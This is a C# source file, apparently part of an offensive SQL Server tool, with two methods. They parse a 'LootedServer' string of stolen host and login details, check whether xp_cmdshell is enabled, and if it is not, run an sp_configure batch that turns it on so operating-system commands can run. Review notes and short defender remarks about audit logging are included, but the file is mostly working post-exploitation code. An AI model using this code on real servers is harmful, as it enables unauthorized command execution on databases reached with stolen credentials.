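/// <summary>
/// Sends an sp_configure batch that sets 'xp_cmdshell' to 1 on the server described by
/// <c>LootedServer</c>, then records the outcome in <c>Result</c>, <c>CmdException</c>
/// and <c>cmdControl</c>.
/// </summary>
/// <remarks>
/// <para>
/// <c>LootedServer</c> is split on ':'; field 0 is used as the server, field 2 as the login
/// and field 3 as the password. Field 1 is not read here. A value with fewer than four
/// fields is reported with the same message as an empty value instead of throwing.
/// </para>
/// <para>
/// Defender context: xp_cmdshell lets T-SQL start operating-system commands under the SQL
/// Server service account (or a configured proxy account). Changing it needs the
/// ALTER SETTINGS permission, which sysadmin and serveradmin hold. Each sp_configure
/// change is written to the SQL Server error log (message 15457), so a 0 -> 1 transition
/// of 'xp_cmdshell' or 'show advanced options' is a useful alerting point, and application
/// logins should not be members of those roles.
/// </para>
/// </remarks>
private void XpCmdShellReConfig()
{
    // NOTE(review): Dispatcher.CurrentDispatcher is the dispatcher of the *calling* thread;
    // if this is reached from a worker thread the delegate does not run on the UI thread.
    // The SQL round trip below also runs inside the dispatched delegate - confirm intent.
    Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
    {
        var changeLang = new LanguageControl();
        changeLang.FindLang();
        Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell3");

        // 'show advanced options' is switched on only for the duration of the change and
        // switched off again at the end of the batch.
        const string openXpCmdShell =
            "EXEC sp_configure 'show advanced options', 1;\n" +
            "RECONFIGURE;\n" +
            "EXEC sp_configure 'xp_cmdshell', 1;\n" +
            "RECONFIGURE;\n" +
            "EXEC sp_configure 'show advanced options', 0;\n" +
            "RECONFIGURE;\n";

        // Missing or malformed input: the original indexed the split result unchecked and
        // could throw IndexOutOfRangeException, which nothing here catches.
        var fields = string.IsNullOrEmpty(LootedServer) ? null : LootedServer.Split(':');
        if (fields == null || fields.Length < 4)
        {
            Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
            return;
        }

        // Build the connection string through a builder so that ';', '=' or quotes inside
        // a field are escaped instead of being parsed as extra connection-string keywords.
        // NOTE(review): a password containing ':' is still truncated by the Split above.
        var connectionString = new System.Data.Common.DbConnectionStringBuilder();
        connectionString["Server"] = fields[0];
        connectionString["Database"] = "master";
        connectionString["Uid"] = fields[2];
        connectionString["Pwd"] = fields[3];

        try
        {
            // using-blocks release the connection, command and reader even when Open()
            // or ExecuteReader() throws; the original leaked them on the error path.
            using (var conn = new SqlConnection(connectionString.ConnectionString))
            using (var cmd = new SqlCommand(openXpCmdShell, conn))
            {
                conn.Open();
                using (var rdr = cmd.ExecuteReader())
                {
                    while (rdr.Read())
                    {
                        Result += $"{Environment.NewLine}{rdr[0]}";
                    }
                }
            }

            Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("XPCmdShell1")}";
            cmdControl.isExecuted = true;
            cmdControl.isActivated = true;
        }
        catch (SqlException exp)
        {
            // NOTE(review): -2146232060 (0x80131904) looks like the generic HRESULT that
            // SqlException reports for every server error, so this test would not tell a
            // permission failure apart from any other failure and the else branch may be
            // unreachable. exp.Number carries the server error number - confirm and switch.
            if (exp.ErrorCode == -2146232060)
            {
                cmdControl.isExecuted = false;
                Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell4");
            }
            else
            {
                CmdException += string.Format(
                    "{2}{3}{0}{1}",
                    Environment.NewLine,
                    exp.Message,
                    changeLang.SelectedLanguage.GetString("GeneralError1"),
                    changeLang.SelectedLanguage.GetString("GeneralError2"));
            }
        }
    }));
}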
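/// <summary>
/// Reads the 'xp_cmdshell' row of sys.configurations on the server described by
/// <c>LootedServer</c>. When the value is greater than zero it marks
/// <c>cmdControl.isActivated</c> and reports that; otherwise it clears the flag and calls
/// <c>XpCmdShellReConfig()</c>.
/// </summary>
/// <remarks>
/// <para>
/// <c>LootedServer</c> is split on ':'; field 0 is used as the server, field 2 as the login
/// and field 3 as the password. Field 1 is not read here. A value with fewer than four
/// fields is reported with the same message as an empty value instead of throwing.
/// </para>
/// <para>
/// The query reads the <c>value</c> column, i.e. the configured value. sys.configurations
/// also exposes <c>value_in_use</c>, the value the running instance actually applies; the
/// two differ between an sp_configure call and the following RECONFIGURE.
/// NOTE(review): confirm which of the two this check is meant to reflect.
/// </para>
/// <para>
/// Defender context: a login that connects to <c>master</c>, reads this setting and then
/// changes it is a recognisable sequence in SQL Server audit data; the change itself is
/// written to the SQL Server error log by sp_configure.
/// </para>
/// </remarks>
public void XpCmdShellStatus()
{
    var changeLang = new LanguageControl();
    changeLang.FindLang();

    const string xpCmdShellStatusCommand = "SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'";

    // Missing or malformed input: the original indexed the split result unchecked and
    // could throw IndexOutOfRangeException, which nothing here catches.
    // NOTE(review): unlike the other updates, this Result write is not dispatched.
    var fields = string.IsNullOrEmpty(LootedServer) ? null : LootedServer.Split(':');
    if (fields == null || fields.Length < 4)
    {
        Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
        return;
    }

    // Build the connection string through a builder so that ';', '=' or quotes inside a
    // field are escaped instead of being parsed as extra connection-string keywords.
    // NOTE(review): a password containing ':' is still truncated by the Split above.
    var connectionString = new System.Data.Common.DbConnectionStringBuilder();
    connectionString["Server"] = fields[0];
    connectionString["Database"] = "master";
    connectionString["Uid"] = fields[2];
    connectionString["Pwd"] = fields[3];

    try
    {
        // Stays at -1 when the query returns no row, which takes the "not enabled" branch.
        var cmdResult = -1;

        // using-blocks release the connection, command and reader even when Open(),
        // ExecuteReader() or the conversion throws; the original leaked them on that path.
        using (var conn = new SqlConnection(connectionString.ConnectionString))
        using (var cmd = new SqlCommand(xpCmdShellStatusCommand, conn))
        {
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    cmdResult = Convert.ToInt32(rdr[0]);
                }
            }
        }

        // The connection is closed before any follow-up work, as in the original.
        // NOTE(review): Dispatcher.CurrentDispatcher is the dispatcher of the *calling*
        // thread; from a worker thread these delegates do not run on the UI thread.
        if (cmdResult > 0)
        {
            Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
            {
                cmdControl.isActivated = true;
                // Assignment, not append: this replaces whatever Result held before.
                Result = Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell2");
            }));
        }
        else
        {
            Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
            {
                cmdControl.isActivated = false;
                XpCmdShellReConfig();
            }));
        }
    }
    catch (SqlException exp)
    {
        CmdException += string.Format(
            "{2}{3}{0}{1}",
            Environment.NewLine,
            exp.Message,
            changeLang.SelectedLanguage.GetString("GeneralError1"),
            changeLang.SelectedLanguage.GetString("GeneralError2"));
    }
}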